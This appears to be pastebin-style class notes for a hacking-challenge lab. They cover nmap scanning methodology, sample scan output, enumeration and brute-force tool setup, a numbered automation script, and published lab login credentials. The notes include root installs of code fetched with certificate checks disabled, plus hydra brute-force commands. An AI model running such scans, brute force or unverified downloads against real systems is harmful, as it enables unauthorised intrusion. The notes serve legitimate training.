joemccray

Chris & Robert lab time

Nov 6th, 2019
The purpose of this class is to help students learn how to address the common issues in Hacking Challenge Lab courses.


Issue 1. Lack of a thorough attack process
==========================================
- Host discovery
- Service discovery
- Service version discovery
- Vulnerability research
- Linux (port 111)/Windows (port 445) enumeration
- Webserver vulnerability scan
- Directory brute force every webserver
- Analyze source code of every web app (look for IPs, usernames/passwords, explanations of how stuff works)
- Brute force all services


Issue 2. Lack of automation of the process
==========================================
- Research attack scripts on the internet to enhance your methodology


Issue 3. Failing to document all steps being performed and their output
=======================================================================


Issue 4. Lack of sleep during the exam
======================================


Issue 5. Failing to reboot target machines prior to attack
==========================================================


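Issue 3 is the one that is easiest to fix mechanically. As an added example (not from the original notes), here is a small POSIX shell wrapper that records every command you run through it: a timestamp, the exact command line, the full output and the exit status all go to one notes file, so the report can be rebuilt from the file instead of from memory. The notes file name and the function names are assumptions.

```sh
#!/bin/sh
# Added example (not from the original notes): a "run and record" wrapper for
# Issue 3. Every command run through run_logged is appended to $NOTES together
# with a UTC timestamp, the command line, its output and its exit status.
# The default notes file name is an assumption; override it with NOTES=...
NOTES="${NOTES:-./engagement-notes.txt}"

# run_logged CMD ARGS...  -- runs CMD, prints its output as usual, and appends a
# dated record to $NOTES. Returns CMD's own exit status so it still works in
# conditionals and pipelines.
run_logged() {
    stamp=$(date -u +%Y-%m-%dT%H:%M:%SZ)
    printf '\n### %s  $ %s\n' "$stamp" "$*" >> "$NOTES"
    # Capture stdout+stderr and the exit status without losing either.
    out=$("$@" 2>&1)
    rc=$?
    printf '%s\n' "$out"
    printf '%s\n[exit status: %d]\n' "$out" "$rc" >> "$NOTES"
    return "$rc"
}

# count_logged_commands -- how many commands have been recorded in $NOTES
count_logged_commands() {
    [ -f "$NOTES" ] || { echo 0; return; }
    grep -c '^### ' "$NOTES" || true
}

# Usage, once sourced into the shell you work from:
#   . ./run_logged.sh
#   run_logged sudo nmap -sS -Pn -iL lab.txt
#   run_logged perl enum4linux.pl -U 172.31.2.11
```

Because the record is written before the command runs, a command that hangs or crashes the box still leaves its command line in the notes, which is exactly the step people forget to write down.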
--------------------------------------------------------------------------------------------------------------


A good strategy to use to prepare would be:

Step 1. Ensure that you are comfortable with Linux
--------------------------------------------------
- LinuxSurvival.com (you should be able to comfortably pass all 4 quizzes)
- CompTIA Linux+ (you should be just a hair under a Linux system administrator in skill level, comfortable with simple shell scripting, and well beyond a Linux user skill level)

You should be very comfortable with the material covered in the videos below (go through all of them twice if you are new to Linux):
https://www.youtube.com/playlist?list=PLCDA423AB5CEC8FDB
https://www.youtube.com/playlist?list=PLtK75qxsQaMLZSo7KL-PmiRarU7hrpnwK
https://www.youtube.com/playlist?list=PLcUid3OP_4OXOUqYTDGjq-iEwtBf-3l2E



Step 2. You should be comfortable with the following tools:
-----------------------------------------------------------

Nmap:
https://www.youtube.com/playlist?list=PL6gx4Cwl9DGBsINfLVidNVaZ-7_v1NJIo

Metasploit:
https://www.youtube.com/playlist?list=PL6gx4Cwl9DGBmwvjJoWhM4Lg5MceSbsja

Burp Suite:
https://www.youtube.com/playlist?list=PLv95pq8fEyuivHeZB2jeC435tU3_1YGzV

Sqlmap:
https://www.youtube.com/playlist?list=PLA3E1E7A07FD60C75

Nikto:
https://www.youtube.com/watch?v=GH9qn_DBzCk

Enum4Linux:
https://www.youtube.com/watch?v=hA5raaGOQKQ

RPCINFO/SHOWMOUNT:
https://www.youtube.com/watch?v=FlRAA-1UXWQ

Hydra:
https://www.youtube.com/watch?v=rLtj8tEmGso



Step 3. You need to be comfortable with basic exploit development
-----------------------------------------------------------------

Basic assembly:
https://www.youtube.com/playlist?list=PLue5IPmkmZ-P1pDbF3vSQtuNquX0SZHpB

Basic exploit development (first 5 videos in the playlist):
https://www.youtube.com/playlist?list=PLWpmLW-3AVsjcz_VJFvofmIFVTk7T-Ukl


Step 4. You need to be comfortable with privilege escalation
------------------------------------------------------------
Linux
https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/

Windows
https://www.sploitspren.com/2018-01-26-Windows-Privilege-Escalation-Guide/
http://www.fuzzysecurity.com/tutorials/16.html



#################################
# Day 1: Advanced Scanning Labs #
#################################


########################
# Scanning Methodology #
########################

- Ping Sweep
What's alive?
------------

---------------------------Type This-----------------------------------
sudo nmap -sP 157.166.226.*

-----------------------------------------------------------------------
(-sP is the old name for nmap's host-discovery-only scan; newer versions spell it -sn and still accept -sP.)



- If -sP yields no results, try a list scan:
---------------------------Type This-----------------------------------
sudo nmap -sL 157.166.226.*

-----------------------------------------------------------------------
(-sL sends nothing to the targets; it only does a reverse-DNS lookup on every address in the range, so it can turn up hostnames on a network that drops ICMP, but it does not prove that anything is alive.)



- Look for hostnames:
---------------------------Type This-----------------------------------
sudo nmap -sL 157.166.226.* | grep com

-----------------------------------------------------------------------



- Port Scan
What's where?
------------
---------------------------Type This-----------------------------------
sudo nmap -sS 162.243.126.247

-----------------------------------------------------------------------



- Bannergrab/Version Query
What versions of software are running?
--------------------------------------

---------------------------Type This-----------------------------------
sudo nmap -sV 162.243.126.247

-----------------------------------------------------------------------




- Vulnerability Research
Look up the banner versions for public exploits
-----------------------------------------------
http://exploit-db.com
http://securityfocus.com/bid
https://packetstormsecurity.com/files/tags/exploit/




-----------------------------------------------------------------------
Some tools to install:
---------------------------Type This-----------------------------------
wget --no-check-certificate https://dl.packetstormsecurity.net/UNIX/scanners/propecia.c
gcc propecia.c -o propecia
sudo cp propecia /bin
-----------------------------------------------------------------------
(--no-check-certificate turns off TLS certificate validation for that download, so read propecia.c before you compile it and copy it into /bin as root.)



- I prefer to use PuTTY to SSH into my Linux host.
- You can download PuTTY from here:
- http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe

Here is the information to put into PuTTY:

ip address: 149.28.201.171
username: labpentest
password: lab!network@attack!



##############################
# Scanning Process to follow #
##############################

Step 1: Host Discovery
----------------------

---------------------------Type This-----------------------------------
nmap -sP 172.31.2.0/24

nmap -sL 172.31.2.0/24

sudo nmap -sS --open -p 22,445 172.31.2.0/24

propecia 172.31.2 22 > file1
propecia 172.31.2 445 > file2
cat file1 file2 > file3
cat file3 | sort -t . -k 3,3n -k 4,4n | uniq > lab.txt
cat lab.txt
-----------------------------------------------------------------------
(propecia is a single-port TCP sweep of the /24, so it finds hosts that drop ICMP but still answer on 22 or 445; the sort keys only look at the last two octets, which is fine for one /24. -sS needs raw sockets, hence sudo.)


Step 2: Port Scan
-----------------
nmap -sS <IP-ADDRESS>
nmap -sU -p 69,161 <IP-ADDRESS>

(-sS and -sU both need raw sockets, so run them as root.)

---------------------------Type This-----------------------------------
sudo nmap -sS 172.31.2.0/24
sudo nmap -sU -p 69,161 172.31.2.0/24
-----------------------------------------------------------------------


Step 3: Bannergrab
------------------
nmap -sV <IP-ADDRESS>
nmap -sV -p- <IP-ADDRESS>
|
----> Vulnerability Research

---------------------------Type This-----------------------------------
sudo nmap -sV 172.31.2.0/24
-----------------------------------------------------------------------



Step 4: Enumerate common Windows/Linux file sharing services
------------------------------------------------------------
Step 3 is where most people STOP, and you need to move on and look deeper.

---------------------------Type This-----------------------------------
sudo apt install smbclient libnss-winbind winbind ldapscripts
wget https://raw.githubusercontent.com/Wh1t3Fox/polenum/master/polenum.py
chmod +x polenum.py
sudo cp polenum.py /bin/
git clone https://github.com/portcullislabs/enum4linux.git
cd enum4linux/
perl enum4linux.pl -U 172.31.2.11

nmap -Pn -n --open -p111 --script=nfs-ls,nfs-showmount,nfs-statfs,rpcinfo 172.31.2.86
-----------------------------------------------------------------------



Step 5: Vulnerability Scan the webservers
-----------------------------------------
git clone https://github.com/sullo/nikto.git Nikto2
cd Nikto2/program
perl nikto.pl -h <IP-ADDRESS>



Step 6: Directory Bruteforce every webserver
--------------------------------------------
sudo apt install -y libcurl4-openssl-dev
git clone https://github.com/v0re/dirb.git
cd dirb/
./configure
make
./dirb
./dirb http://<IP-ADDRESS> wordlists/big.txt



Step 7: Analyze source code of all webpages found
-------------------------------------------------
lynx -dump "http://<IP-ADDRESS>" | grep -o "http:.*" > links

If you ever need to download an entire web site, perhaps for off-line viewing, wget can do the job. For example:

$ wget \
    --recursive \
    --no-clobber \
    --page-requisites \
    --html-extension \
    --convert-links \
    --restrict-file-names=windows \
    --domains website.org \
    --no-parent \
    www.website.org/tutorials/html/

This command downloads the web site www.website.org/tutorials/html/.

The options are:

--recursive: download the entire web site.
--domains website.org: don't follow links outside website.org.
--no-parent: don't follow links outside the directory tutorials/html/.
--page-requisites: get all the elements that compose the page (images, CSS and so on).
--html-extension: save files with the .html extension (newer wget versions call this --adjust-extension; the old name still works).
--convert-links: convert links so that they work locally, off-line.
--restrict-file-names=windows: modify filenames so that they will work in Windows as well.
--no-clobber: don't overwrite any existing files (used in case the download is interrupted and resumed).



Step 8: Bruteforce any services you find
----------------------------------------
sudo apt install -y zlib1g-dev libssl-dev libidn11-dev libcurses-ocaml-dev libpcre3-dev libpq-dev libsvn-dev libssh-dev libmysqlclient-dev
mkdir -p ~/toolz
cd ~/toolz
git clone https://github.com/vanhauser-thc/thc-hydra.git
cd thc-hydra
./configure
make
./hydra -L username.txt -P passlist.txt ftp://<IP-ADDRESS>
./hydra -l user -P passlist.txt ftp://<IP-ADDRESS>



##################
# Host Discovery #
##################

Reason:
-------
You have to discover the reachable hosts in the network before you can attack them.


Host discovery syntax:
----------------------
nmap -sP 172.31.2.0/24
propecia 172.31.2 22 > file1
propecia 172.31.2 445 > file2
cat file1 file2 > file3
cat file3 | sort -t . -k 3,3n -k 4,4n | uniq > lab.txt
cat lab.txt

Issues:
-------
The issue we had to deal with was hosts that didn't respond to ICMP, which is why the ping sweep is backed up by the propecia TCP sweeps on ports 22 and 445 and all three results are merged into lab.txt.


Hosts discovered:
-----------------
172.31.2.11
172.31.2.14
172.31.2.47
172.31.2.64
172.31.2.86
172.31.2.117
172.31.2.157
172.31.2.217
172.31.2.238



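The merge above works for one /24, but the sort only keys on the last two octets and anything that is not an address (a stray error line, for instance) ends up in lab.txt. As an added example (not from the original notes), the function below merges any number of per-port host lists into a single target list sorted numerically on all four octets, dropping duplicates and non-address lines. It assumes each input file holds one IPv4 address per line, which is how the notes treat the propecia output files; the sample files are constructed from the hosts listed above.

```sh
#!/bin/sh
# Added example (not from the original notes): merge per-port host lists (the
# propecia output for ports 22 and 445, a ping-sweep result, ...) into one
# de-duplicated target list. Assumption: one IPv4 address per input line.

# merge_hosts FILE...  -- union of the IPv4 addresses in FILE..., one per line,
# sorted numerically octet by octet; duplicates and non-address lines are dropped.
merge_hosts() {
    cat "$@" \
      | grep -E '^[0-9]{1,3}(\.[0-9]{1,3}){3}$' \
      | sort -t . -k 1,1n -k 2,2n -k 3,3n -k 4,4n -u
}

# count_hosts FILE  -- number of targets in a merged list
count_hosts() {
    grep -c . "$1"
}

# Constructed sample input standing in for "propecia 172.31.2 22 > file1" and
# "propecia 172.31.2 445 > file2"; the addresses are the ones the notes found.
# file2 deliberately repeats .11 and carries a junk line to show both are dropped.
tmpdir=$(mktemp -d)
cat > "$tmpdir/file1" <<'EOF'
172.31.2.47
172.31.2.64
172.31.2.86
172.31.2.117
172.31.2.157
172.31.2.217
172.31.2.238
EOF
cat > "$tmpdir/file2" <<'EOF'
172.31.2.11
172.31.2.14
172.31.2.86
connect: Connection timed out
172.31.2.11
EOF

merge_hosts "$tmpdir/file1" "$tmpdir/file2" > "$tmpdir/lab.txt"
cat "$tmpdir/lab.txt"
```

The resulting lab.txt is what the -iL runs in the next two sections consume; sorting on all four octets also means the list stays in order if the lab spans more than one /24.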
#####################
# Service Discovery #
#####################

Reason:
-------
Identifying what services are running on what hosts lets you map the network and decide which enumeration and attack steps apply to each host.



Port scan syntax:
-----------------
sudo nmap -sS -Pn -iL lab.txt
sudo nmap -sU -p69,161 -Pn -iL lab.txt

(-Pn skips nmap's own host discovery, which matters because some of these hosts drop ICMP; -iL reads the targets from the lab.txt built above. The 69/udp and 161/udp lines below come from the second, UDP, command; open|filtered means no reply came back, so nmap cannot tell a silent open UDP service from a filtered port, and you should confirm with a protocol-specific probe before treating it as open.)



Services discovered:
--------------------

joe@metasploit-box:~$ sudo nmap -sS -Pn -iL lab.txt

Starting Nmap 7.60SVN ( https://nmap.org ) at 2018-05-05 14:52 UTC
Nmap scan report for 172.31.2.11
Host is up (0.087s latency).
Not shown: 995 filtered ports
PORT     STATE SERVICE
21/tcp   open  ftp
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3389/tcp open  ms-wbt-server
9999/tcp open  abyss

Nmap scan report for 172.31.2.11
Host is up.

PORT    STATE         SERVICE
69/udp  open|filtered tftp
161/udp open|filtered snmp


Nmap scan report for 172.31.2.14
Host is up (0.087s latency).
Not shown: 995 filtered ports
PORT     STATE SERVICE
21/tcp   open  ftp
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3389/tcp open  ms-wbt-server
9999/tcp open  abyss


Nmap scan report for 172.31.2.14
Host is up.

PORT    STATE         SERVICE
69/udp  open|filtered tftp
161/udp open|filtered snmp


Nmap scan report for 172.31.2.47
Host is up (0.086s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap scan report for 172.31.2.64
Host is up (0.087s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
6667/tcp open  irc

Nmap scan report for 172.31.2.86
Host is up (0.086s latency).
Not shown: 989 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
53/tcp   open  domain
80/tcp   open  http
110/tcp  open  pop3
111/tcp  open  rpcbind
139/tcp  open  netbios-ssn
143/tcp  open  imap
445/tcp  open  microsoft-ds
993/tcp  open  imaps
995/tcp  open  pop3s
8080/tcp open  http-proxy

Nmap scan report for 172.31.2.117
Host is up (0.087s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
2020/tcp open  xinupageserver

Nmap scan report for 172.31.2.157
Host is up (0.087s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http

Nmap scan report for 172.31.2.217
Host is up (0.087s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
3260/tcp open  iscsi

Nmap scan report for 172.31.2.238
Host is up (0.087s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
6969/tcp open  acmsoda

Nmap done: 9 IP addresses (9 hosts up) scanned in 14.82 seconds




##############################################
# Service Version Discovery (Bannergrabbing) #
##############################################
Reason:
-------
Identifying what versions of services are running on what hosts lets you determine whether the hosts are vulnerable to attack: the version strings below are what you look up on exploit-db and the other sites listed under Vulnerability Research.



Version scan syntax:
--------------------

joe@metasploit-box:~$ sudo nmap -sV -Pn -iL lab.txt

Starting Nmap 7.60SVN ( https://nmap.org ) at 2018-05-05 14:56 UTC
Nmap scan report for 172.31.2.11
Host is up (0.087s latency).
Not shown: 995 filtered ports
PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           FreeFloat ftpd 1.00
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds  Microsoft Windows 2003 or 2008 microsoft-ds
3389/tcp open  ms-wbt-server Microsoft Terminal Service
9999/tcp open  abyss?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_server_2003

Nmap scan report for 172.31.2.14
Host is up (0.087s latency).
Not shown: 995 filtered ports
PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           FreeFloat ftpd 1.00
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds  Microsoft Windows 2003 or 2008 microsoft-ds
3389/tcp open  ms-wbt-server Microsoft Terminal Service
9999/tcp open  abyss?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_server_2003

Nmap scan report for 172.31.2.47
Host is up (0.087s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.4 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.2.22 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Nmap scan report for 172.31.2.64
Host is up (0.087s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.6 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    Apache httpd 2.4.7 ((Ubuntu))
6667/tcp open  irc     ngircd
Service Info: Host: irc.example.net; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Nmap scan report for 172.31.2.86
Host is up (0.087s latency).
Not shown: 989 closed ports
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
53/tcp   open  domain      ISC BIND 9.9.5-3 (Ubuntu Linux)
80/tcp   open  http        Apache httpd 2.4.7 ((Ubuntu))
110/tcp  open  pop3        Dovecot pop3d
111/tcp  open  rpcbind     2-4 (RPC #100000)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp  open  imap        Dovecot imapd (Ubuntu)
445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
993/tcp  open  ssl/imap    Dovecot imapd (Ubuntu)
995/tcp  open  ssl/pop3    Dovecot pop3d
8080/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1
Service Info: Host: SEDNA; OS: Linux; CPE: cpe:/o:linux:linux_kernel, cpe:/o:canonical:ubuntu_linux

Nmap scan report for 172.31.2.117
Host is up (0.086s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    Apache httpd 2.4.7 ((Ubuntu))
2020/tcp open  ftp     vsftpd 2.0.8 or later
Service Info: Host: minotaur; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Nmap scan report for 172.31.2.157
Host is up (0.086s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 2.0.8 or later
22/tcp open  ssh     OpenSSH 6.6.1 (protocol 2.0)
80/tcp open  http    Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)

Nmap scan report for 172.31.2.217
Host is up (0.087s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    nginx
3260/tcp open  iscsi?
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Nmap scan report for 172.31.2.238
Host is up (0.087s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
80/tcp   open  http    nginx 1.6.2
6969/tcp open  acmsoda?
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 9 IP addresses (9 hosts up) scanned in 170.68 seconds


Note that the version scan reclassified 2020/tcp on 172.31.2.117 from xinupageserver to ftp (vsftpd): the service name in a plain -sS scan is only a port-number lookup, which is why you bannergrab before doing vulnerability research.



-----------------------------------------------------------------------

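Both the Steps 1-8 scanning process above and this version-discovery section end at the same place: a block of nmap output that steps 4 through 8 now have to be run against, host by host. As an added example (not from the original notes), here is a small POSIX shell/awk parser that turns normal nmap -sV output into per-service target lists and a de-duplicated set of version banners for vulnerability research, so the follow-on enumeration can be driven from one file instead of retyped. The sample input is constructed from three of the nine host reports shown above; the function names are assumptions. For real runs nmap's -oG or -oX output is the more robust thing to parse, but this handles the normal output exactly as it appears in these notes.

```sh
#!/bin/sh
# Added example (not from the original notes): parse normal "nmap -sV" output
# into per-service target lists so that steps 4-8 can be driven from one scan.
# Assumptions: input is nmap's normal (console / -oN) output, and only ports
# whose STATE is exactly "open" are kept, so UDP "open|filtered" ports are skipped.

# nmap_services FILE...  -- prints "IP PORT/PROTO SERVICE [VERSION...]" per open port
nmap_services() {
    awk '
        # Each host block starts with this line; the address is the last token,
        # parenthesised when nmap also printed a hostname.
        /^Nmap scan report for / { ip = $NF; gsub(/[()]/, "", ip); next }
        ip != "" && $1 ~ /^[0-9]+\/(tcp|udp)$/ && $2 == "open" {
            printf "%s %s %s", ip, $1, $3
            for (i = 4; i <= NF; i++) printf " %s", $i
            printf "\n"
        }
    ' "$@"
}

# hosts_with_port FILE PORT[/PROTO]  -- IPs with that port open, for feeding to
# enum4linux (445), nikto/dirb (80), hydra (21/22) and so on. PROTO defaults to tcp.
hosts_with_port() {
    port=$2
    case $port in */*) ;; *) port="$port/tcp" ;; esac
    nmap_services "$1" | awk -v p="$port" '$2 == p { print $1 }' \
        | sort -t . -k 1,1n -k 2,2n -k 3,3n -k 4,4n -u
}

# version_banners FILE  -- unique "service version" strings to look up on
# exploit-db and friends; ports with no version fingerprint are left out.
version_banners() {
    nmap_services "$1" | awk 'NF > 3 { $1 = ""; $2 = ""; sub(/^ +/, ""); print }' | sort -u
}

# Constructed sample: a cut-down copy of the -sV output shown above.
tmpdir=$(mktemp -d)
cat > "$tmpdir/sv.nmap" <<'EOF'
Starting Nmap 7.60SVN ( https://nmap.org ) at 2018-05-05 14:56 UTC
Nmap scan report for 172.31.2.11
Host is up (0.087s latency).
Not shown: 995 filtered ports
PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           FreeFloat ftpd 1.00
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds  Microsoft Windows 2003 or 2008 microsoft-ds
3389/tcp open  ms-wbt-server Microsoft Terminal Service
9999/tcp open  abyss?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_server_2003

Nmap scan report for 172.31.2.11
Host is up.

PORT    STATE         SERVICE
69/udp  open|filtered tftp
161/udp open|filtered snmp

Nmap scan report for 172.31.2.47
Host is up (0.087s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.4 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.2.22 ((Ubuntu))

Nmap scan report for sedna (172.31.2.86)
Host is up (0.087s latency).
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http        Apache httpd 2.4.7 ((Ubuntu))
111/tcp  open  rpcbind     2-4 (RPC #100000)
445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
8080/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1

Nmap done: 3 IP addresses (3 hosts up) scanned in 170.68 seconds
EOF

# Typical use: hand a per-service list straight to the follow-on tool, e.g.
#   hosts_with_port sv.nmap 445 | while read -r h; do perl enum4linux.pl -U "$h"; done
hosts_with_port "$tmpdir/sv.nmap" 445
version_banners "$tmpdir/sv.nmap"
```

Because the parser keys on the STATE column rather than on the port number, the 2020/tcp vsftpd on minotaur would show up under version_banners as "ftp vsftpd 2.0.8 or later" and hosts_with_port 2020 would list it, which is exactly the kind of non-standard port that a "scan port 21 only" sweep misses.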
  641. #!/bin/bash
  642.  
  643. # Script made during the CyberWar class for the students to play with, debug, and improve.
  644. # Take a look at the following websites for ideas:
  645. # https://github.com/commonexploits/port-scan-automation
  646. # https://www.commonexploits.com/penetration-testing-scripts/
  647. # https://github.com/averagesecurityguy/scripts
  648. # https://github.com/jmortega/europython_ethical_hacking/blob/master/NmapScannerAsync.py
  649.  
  650.  
  651.  
  652. # Some thoughts of things to add to this script:
  653. # Shodan queries (API key)
  654. # AWS scanning (need credentials)
  655. # Jenkins scanning
  656. # Active Directory enumeration
  657. # Github scanning (API key required)
  658. # Blockchain platforms
  659.  
  660.  
  661.  
  662.  
  663.  
  664.  
  665.  
  666. #############################################
  667. # Check to see if script is running as root #
  668. #############################################
  669. if [ "$EUID" -ne 0 ]
  670. then echo "Please run as root"
  671. exit
  672. fi
  673.  
  674.  
  675. ####################################
  676. # Check to see if gcc is installed #
  677. ####################################
  678. file1="/usr/bin/gcc"
  679. if [ -f "$file1" ]
  680. then
  681. echo "$file is installed."
  682. clear
  683. else
  684. echo "$file not found."
  685. echo Installing gcc
  686. apt-get install -y gcc
  687. clear
  688. fi
  689.  
  690. ########################
  691. # Make the directories #
  692. ########################
  693. cd /tmp
  694. rm -rf customerAudit/
  695. rm -rf NetworkAudit/
  696. mkdir -p /tmp/NetworkAudit/discovered_services/
  697. mkdir -p /tmp/NetworkAudit/scan/windows/
  698. mkdir -p /tmp/NetworkAudit/scan/sunrpc/
  699. mkdir -p /tmp/NetworkAudit/scan/ssh/
  700. mkdir -p /tmp/NetworkAudit/scan/ftp/
  701. mkdir -p /tmp/NetworkAudit/scan/http/
  702. mkdir -p /tmp/NetworkAudit/scan/telnet/
  703. mkdir -p /tmp/NetworkAudit/scan/pop3/
  704. mkdir -p /tmp/NetworkAudit/scan/printers/
  705. mkdir -p /tmp/NetworkAudit/scan/mssql_databases/
  706. mkdir -p /tmp/NetworkAudit/scan/oracle_databases/
  707. mkdir -p /tmp/NetworkAudit/scan/mysql_databases/
  708. mkdir -p /tmp/NetworkAudit/scan/mongodb_databases/
  709.  
  710.  
  711. #####################
  712. # Download propecia #
  713. #####################
  714. file2="/bin/propecia"
  715. if [ -f "$file2" ]
  716. then
  717. echo "$file is installed."
  718. clear
  719. else
  720. echo "$file not found."
  721. echo Installing propecia
  722. cd /tmp
  723. wget --no-check-certificate https://dl.packetstormsecurity.net/UNIX/scanners/propecia.c
  724. gcc propecia.c -o propecia
  725. cp propecia /bin
  726. fi
  727.  
  728. ######################
  729. # Find Windows Hosts #
  730. ######################
  731. clear
  732. echo "Scanning for windows hosts."
  733. propecia 172.31.2 445 >> /tmp/NetworkAudit/discovered_services/windows_hosts
  734. clear
  735. echo "Done scanning for windows hosts. FTP is next."
  736.  
  737.  
  738. ##################
  739. # Find FTP Hosts #
  740. ##################
  741. echo "Scanning for hosts running FTP."
  742. propecia 172.31.2 21 >> /tmp/NetworkAudit/discovered_services/ftp_hosts
  743. clear
  744. echo "Done scanning for FTP hosts. SSH is next."
  745.  
  746. ##################
  747. # Find SSH Hosts #
  748. ##################
  749. echo "Scanning for hosts running SSH."
  750. propecia 172.31.2 22 >> /tmp/NetworkAudit/discovered_services/ssh_hosts
  751. clear
  752. echo "Done scanning for SSH hosts. POP3 is next."
  753.  
  754.  
  755. ###################
  756. # Find POP3 Hosts #
  757. ###################
  758. echo "Scanning for hosts running POP3."
  759. propecia 172.31.2 110 >> /tmp/NetworkAudit/discovered_services/pop3_hosts
  760. clear
  761. echo "Done scanning for POP3 hosts. SunRPC is next."
  762.  
  763.  
  764. #####################
  765. # Find SunRPC Hosts #
  766. #####################
  767. echo "Scanning for hosts running SunRPC."
  768. propecia 172.31.2 111 >> /tmp/NetworkAudit/discovered_services/sunrpc_hosts
  769. clear
  770. echo "Done scanning for SunRPC hosts. Telnet is next."
  771.  
  772.  
  773. #####################
  774. # Find Telnet Hosts #
  775. #####################
  776. echo "Scanning for hosts running Telnet."
  777. propecia 172.31.2 23 >> /tmp/NetworkAudit/discovered_services/telnet_hosts
  778. clear
  779. echo "Done scanning for Telnet hosts. HTTP is next."
  780.  
  781.  
  782. ###################
  783. # Find HTTP Hosts #
  784. ###################
  785. echo "Scanning for hosts running HTTP"
  786. propecia 172.31.2 80 >> /tmp/NetworkAudit/discovered_services/http_hosts
  787. clear
  788. echo "Done scanning for HTTP hosts. HTTPS hosts are next."
  789.  
  790.  
  791. ###################
  792. # Find HTTPS Hosts #
  793. ###################
  794. echo "Scanning for hosts running HTTP"
  795. propecia 172.31.2 443 >> /tmp/NetworkAudit/discovered_services/https_hosts
  796. clear
  797. echo "Done scanning for HTTPS hosts. Databases are next."
  798.  
  799.  
  800. ##################
  801. # Find Databases #
  802. ##################
  803. echo "Scanning for hosts running MS SQL Server"
  804. propecia 172.31.2 1433 >> /tmp/NetworkAudit/discovered_services/mssql_hosts
  805. clear
  806.  
  807. echo "Scanning for hosts running Oracle"
  808. propecia 172.31.2 1521 >> /tmp/NetworkAudit/discovered_services/oracle_hosts
  809. clear
  810.  
  811. echo "Scanning for hosts running Postgres"
  812. propecia 172.31.2 5432 >> /tmp/NetworkAudit/discovered_services/postgres_hosts
  813. clear
  814.  
  815. echo "Scanning for hosts running MongoDB"
  816. propecia 172.31.2 27017 >> /tmp/NetworkAudit/discovered_services/mongodb_hosts
  817. clear
  818.  
  819. echo "Scanning for hosts running MySQL"
  820. propecia 172.31.2 3306 >> /tmp/NetworkAudit/discovered_services/mysql_hosts
  821. clear
  822. echo "Done doing the host discovery. Moving on to nmap'ing each host discovered. Windows hosts are first."
  823.  
  824.  
  825. ###############################
  826. # Ok, let's do the NMAP files #
  827. ###############################
  828. clear
  829. # Windows
  830. for x in `cat /tmp/NetworkAudit/discovered_services/windows_hosts` ; do nmap -Pn -n --open -p445 --script=msrpc-enum,smb-enum-domains,smb-enum-groups,smb-enum-processes,smb-enum-sessions,smb-enum-shares,smb-enum-users,smb-mbenum,smb-os-discovery,smb-security-mode,smb-server-stats,smb-system-info,smbv2-enabled,stuxnet-detect $x > /tmp/NetworkAudit/scan/windows/$x ; done
  831. echo "Done with Windows."
  832.  
